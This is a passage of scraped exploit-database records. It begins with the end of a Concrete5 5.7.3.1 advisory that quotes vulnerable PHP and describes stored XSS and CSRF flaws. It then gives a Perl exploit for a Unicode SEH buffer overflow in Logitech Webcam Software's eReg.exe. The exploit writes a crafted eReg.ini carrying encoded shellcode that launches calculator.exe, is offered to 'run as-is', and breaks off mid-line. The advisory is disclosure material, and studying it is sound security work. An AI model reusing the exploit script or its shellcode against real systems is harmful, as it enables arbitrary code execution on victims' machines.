(!$this->upa->pkgID) {\r\n105. // i hate this activerecord crap\r\n106. $this->upa->pkgID = 0;\r\n107. }\r\n108. $this->upa->upaIsActive = 0;\r\n109. if ($this->post('upaIsActive')) {\r\n110. $this->upa->upaIsActive = 1;\r\n111. }\r\n112. \r\n113. $this->upa->save();\r\n114. } else {\r\n115. $upa = UserPointAction::add($this->post('upaHandle'), $this->post('upaName'), $this->post('upaDefaultPoints'), $this->post('gBadgeID'), $this->post('upaIsActive'));\r\n116. }\r\n\r\nUser input passed through the \"upaHandle\" and \"upaName\" POST parameters is not properly sanitized\r\nbefore being stored. This can be exploited by an authenticated attacker to permanently store\r\narbitrary script code within the database, which might be executed by another user while browsing\r\nto the \"Community Points Actions\" page.\r\n\r\nNOTE: the vulnerability can be exploited only by authenticated users, however an attacker\r\ncan leverage a CSRF vulnerability related to the \"Community Points Actions\" page.\r\n\r\n5) The vulnerable code is located in /concrete/elements/files/add_to_sets.php:\r\n\r\n110. if ($_POST['fsNew']) {\r\n111. $type = ($_POST['fsNewShare'] == 1) ? FileSet::TYPE_PUBLIC : FileSet::TYPE_PRIVATE;\r\n112. $fs = FileSet::createAndGetSet($_POST['fsNewText'], $type);\r\n113. //print_r($fs);\r\n\r\nUser input passed through the \"fsNewText\" POST parameter is not properly sanitized before being stored.\r\nThis can be exploited by an authenticated attacker to permanently store arbitrary script code within the\r\ndatabase, which might be executed by another user while browsing to the \"Add to New Set\" panel.\r\n\r\nNOTE: the vulnerability can be exploited only by authenticated users, however an attacker\r\ncan leverage a CSRF vulnerability related to the \"File Manager\" page.\r\n\r\n6) The vulnerable code is located in /concrete/controllers/single_page/dashboard/extend/connect.php:\r\n\r\n18. public function connect_complete() {\r\n19. $tp = new TaskPermission();\r\n20. if ($tp->canInstallPackages()) {\r\n21. if (!$_POST['csToken']) {\r\n22. $this->set('error', array(t('An unexpected error occurred when connecting your site to the marketplace.')));\r\n23. } else {\r\n24. $config = \\Core::make('config/database');\r\n25. $config->save('concrete.marketplace.token', $_POST['csToken']);\r\n26. $config->save('concrete.marketplace.url_token', $_POST['csURLToken']);\r\n\r\nUser input passed through the \"csToken\" and \"csURLToken\" POST parameters is not properly sanitized\r\nbefore being stored into a configuration setting. This can be exploited by an authenticated attacker\r\nto permanently store arbitrary script code within the database, which might be executed by another\r\nuser while browsing to the \"Extend Concrete5\" pages.\r\n\r\nNOTE: the vulnerability can be exploited only by authenticated users, however an attacker\r\ncan leverage a CSRF vulnerability related to the \"Community Connect\" page.\r\n\r\n7) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/multilingual/translate_interface.php:\r\n\r\n110. public function save_translation()\r\n111. {\r\n112. $mtID = intval($this->post('mtID'));\r\n113. $translation = Translation::getByID($mtID);\r\n114. if (is_object($translation)) {\r\n115. $translation->updateTranslation($this->post('msgstr'));\r\n116. }\r\n\r\nUser input passed through the \"msgstr\" POST parameter is not properly sanitized before being stored.\r\nThis can be exploited by an authenticated attacker to permanently store arbitrary script code within the\r\ndatabase, which might be executed by another user while browsing to the \"Translate Site Interface\" page.\r\n\r\nNOTE: the vulnerability can be exploited only by authenticated users, however an attacker\r\ncan leverage a CSRF vulnerability related to the \"Translate Site Interface\" page.\r\n\r\n--------------------------------------------------------------------------\r\nConcrete5 <= 5.7.3.1 Multiple Cross-Site Request Forgeries Vulnerabilities\r\n--------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttps://www.concrete5.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 5.7.3.1 and probably other versions.\r\n\r\n\r\n[-] Vulnerabilities Description:\r\n\r\nConcrete5 implements a Synchronizer Token Pattern in order to provide anti-CSRF capabilities.\r\nHowever, the application fails to properly use this feature in every block or dashboard page\r\nwhich makes a system state change, such as settings modification. As a result, the application\r\nis vulnerable to some Cross-Site Request Forgery (CSRF) attacks:\r\n\r\n1) File Manager - Delete: an attacker might force an authenticated user to delete files from\r\nthe File Manager by tricking the victim into browsing to a specially crafted web page.\r\n\r\n2) Public Registration Settings: an attacker might force an authenticated user to change the\r\nPublic Registration Settings by tricking the victim into browsing to a specially crafted web page.\r\n\r\n3) Public Profiles Settings: an attacker might force an authenticated user to change the Public\r\nProfiles Settings by tricking the victim into browsing to a specially crafted web page.\r\n\r\n4) Authentication Types Settings: an attacker might force an authenticated user to enable or\r\ndisable an authentication type, or change its settings by tricking the victim into browsing\r\nto a specially crafted web page.\r\n\r\n5) Community Points: an attacker might force an authenticated user to assign points to arbitrary\r\nusers, or add, delete, and edit Community Points Actions by tricking the victim into browsing to\r\na specially crafted web page.\r\n\r\n6) Translation Site Interface: an attacker might force an authenticated user to save arbitrary\r\ntranslation strings by tricking the victim into browsing to a specially crafted web page.\r\n\r\n7) Add / Remove Group: an attacker might force an authenticated user to add/remove an arbitrary\r\nuser to/from a group by tricking the victim into browsing to a specially crafted web page.\r\n\r\n8) Community Connect: an attacker might force an authenticated user to change tokens used to\r\nconnect to the marketplace by tricking the victim into browsing to a specially crafted web page.\r\n\r\n\r\n[-] Solution:\r\n\r\nUpdate to a fixed version.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[05/05/2015] - Vulnerabilities details sent through HackerOne\r\n[02/10/2015] - CVE number requested\r\n[28/12/2015] - Vendor said the vulnerabilities should be fixed in the upstream\r\n[26/06/2016] - Vulnerabilities publicly disclosed on HackerOne\r\n[28/06/2016] - Publication of this advisory\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas not assigned a CVE identifier for these vulnerabilities.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerabilities discovered by Egidio Romano.\n\n# 0day.today [2016-07-01] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/25604", "hash": "bb2eae306c47aebae6bddd19cc1513dbe3f92397e203fc6450e2fe09e93ab496"}, {"lastseen": "2016-04-20T02:04:22", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 1, "reporter": "Robbie Corley", "published": "2015-09-11T00:00:00", "type": "zdt", "title": "Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow Vulnerability", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-09-11T00:00:00", "href": "http://0day.today/exploit/description/24236", "id": "1337DAY-ID-24236", "sourceData": "#*************************************************************************************************************\r\n# \r\n# Title: Logitech Webcam Software 1.1 eReg.exe SEH/Unicode Buffer Overflow\r\n# Date: 9-10-2015\r\n# Target tested: Windows 7 (x64)\r\n# Software Link: http://www.logitech.com/pub/techsupport/quickcam/lws110_x64.exe\r\n# Author: Robbie Corley\r\n# Contact: c0d3rc0rl3y@gmail.com\r\n# Website: \r\n# CVE: \r\n# Category: Local \r\n#\r\n# Description:\r\n# The Webcam Logitech registration .ini file is vulnerable to a unicode SEH based buffer overflow. \r\n# \r\n# Instructions: \r\n# Run this as-is. I've made it simple enough to write the new \"eReg.ini\" file \r\n# to the program files directory and open the vulerable application for you.\r\n# You can also comment out the \"system()\" command and run the \"eReg.exe\" program manually; it's up to you.\r\n# You will be presented with the calculator.exe program and the app will crash\r\n# due to an intentional int 3 breakpoint added to conserve shellcode bytes.\r\n#\r\n#**************************************************************************************************************\r\n \r\nprint \"running...you should see the calculator in a second or two...\";\r\nmy $everything=\r\n\"[Family_Name]\r\nFamily=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAabfJXB-\u0011\u0011B\u0005\u0012\u0011BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBPPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBNQHRwBLpqTtKJrtKnrLLdKpRKl8kkPbkMrzhTKPro0dKN2cPQnjlLsRUkBXkKP1yhG9sd8OLTKOg1hIqGRDKCJKp9q6gnQZMZKIp4KNTvOKQy6PE3QMnQG1YRNQ5puL2rkRZkt9qvgc6BkNLROTKrZmLM1uwtKSLdoKLkQxGJKJoOkp1Ep20R33YIkkO9CxMzcxMKSfmKSxhxlKOKOKOQS1QPlqSNNqUSHaUypKPAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\r\n[Scheduling]\r\nLaunchDelayHours=48\r\nLaunchRetryHours=1\r\nSurveyDelayHours=336\r\n\";\r\n \r\nopen(myfile,'>C:\\\\Program Files\\\\Logitech\\\\Logitech WebCam Software\\\\eReg.ini'); #create our payload and overwrite original eReg.ini file\r\n \r\nprint 